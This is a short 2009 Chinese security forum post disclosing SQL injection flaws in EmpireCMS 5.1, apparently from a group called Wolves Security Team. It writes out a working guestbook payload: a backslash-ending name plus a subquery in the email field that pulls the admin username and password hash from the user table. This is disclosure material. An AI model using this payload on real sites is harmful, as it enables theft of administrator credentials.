EmpireCMS 5.1 多个垃圾注射漏洞

flyh4t · 2009-02-19 14:34:59

EmpireCMS 5.1 有个过滤函数没处理好\，可能导致产生多处垃圾类型的注射漏洞

比如留言处注射：

e/tool/gbook/?bid=1

姓名：縗\

邮箱：,1,1,1,(select concat(username,0x5f,password,0x5f,rnd) from phome_enewsuser where userid=1),1,1,1,0,0,0)/*

电话和留言内容随便写，提交完了就可以看到密码了

代码和exp就不贴了

flyh4t · 2009-06-29 10:49:36

转出来吧

Wolves Security Team